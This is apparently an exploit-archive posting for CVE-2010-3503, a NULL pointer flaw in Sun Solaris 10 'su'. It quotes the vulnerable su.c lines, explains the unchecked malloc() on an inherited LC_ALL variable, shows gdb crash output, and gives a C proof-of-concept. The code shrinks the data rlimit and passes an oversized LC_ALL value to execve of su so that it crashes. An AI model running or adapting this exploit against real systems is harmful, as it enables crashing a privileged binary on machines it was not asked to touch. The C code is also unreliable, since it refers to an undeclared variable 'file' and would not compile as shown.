Oracle Sun Solaris 10 su NULL point proof of concept exploit.
eba90a94a7182395d586cd8f497035232e075f309dfba27247a0e3361c6309b0
From https://cvs.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/cmd/su/su.c
521 for (j = 0; initenv[j] != 0; j++) { [1]
522 if (initvar = getenv(initenv[j])) { [2]
...
535 } else {
536 var = (char *)
537 malloc(strlen(initenv[j]) [3]
538 + strlen(initvar)
539 + 2);
540 (void) strcpy(var, initenv[j]); [4]
'su' when creating new environment from inherited environment inherits values defined
such as LC_ALL and TZ, the call at [1] walks over an array of values to inherit and
then at [2] when it finds one it does some checks if its not TZ= e.g. LC_ALL it passes
the variable into a controllable malloc() [3] WITH NO CHECKING ON RETURNED VALUE, this
means if malloc() fails it could return 0x0 and pass to strcpy() at [4] introducing
a null ptr vulnerability in 'su'.
Program terminated with signal 11, Segmentation fault.
#0 0xd1244734 in ?? ()
(gdb) x/i $pc
0xd1244734: mov %eax,(%edi)
(gdb) i r $eax
eax 0x415f434c 1096762188 <- OUR STRING
(gdb) i r $edi
edi 0x0 0 <- NULL PTR
Incurred fault #6, FLTBOUNDS %pc = 0xD1244734
siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000
----[ PoC trigger 'su' as you.
/* Sun Solaris <= 10 'su' NULL pointer exploit
===========================================
because these are so 2009 now. I would exploit
this but my name is not spender or raptor. Sun
do not check a call to malloc() when handling
environment variables in 'su' code. They also
don't check passwords when using telnet so who
cares? You have to enter your local user pass
to see this bug. Enjoy!
admin@sundevil:~/suid$ ./x
[ SunOS 5.11 'su' null ptr PoC
Password:
Segmentation Fault
-- prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
struct {
rlim_t rlim_cur; /* current (soft) limit */
rlim_t rlim_max; /* hard limit */
} rlimit;
int main(int argc,char *argv[]){
int fd;
struct rlimit* rlp = malloc(sizeof(rlimit));
getrlimit(RLIMIT_DATA,rlp);
char* buf1 = malloc(300000);
memset(buf1,'A',300000);
long buf2 = (long)buf1 + 299999;
memset((char*)buf2,0,1);
memcpy(buf1,"LC_ALL=",7);
rlp->rlim_cur = 16400;
setrlimit(RLIMIT_DATA,rlp);
char* env[] = {buf1,file,NULL};
char* args[] = {"su","-",getlogin(),NULL};
printf("[ SunOS 5.11 'su' null ptr PoC\n");
execve("/usr/bin/su",args,env);
}
// This was disclosed and patched in October 2010, CVE-2010-3503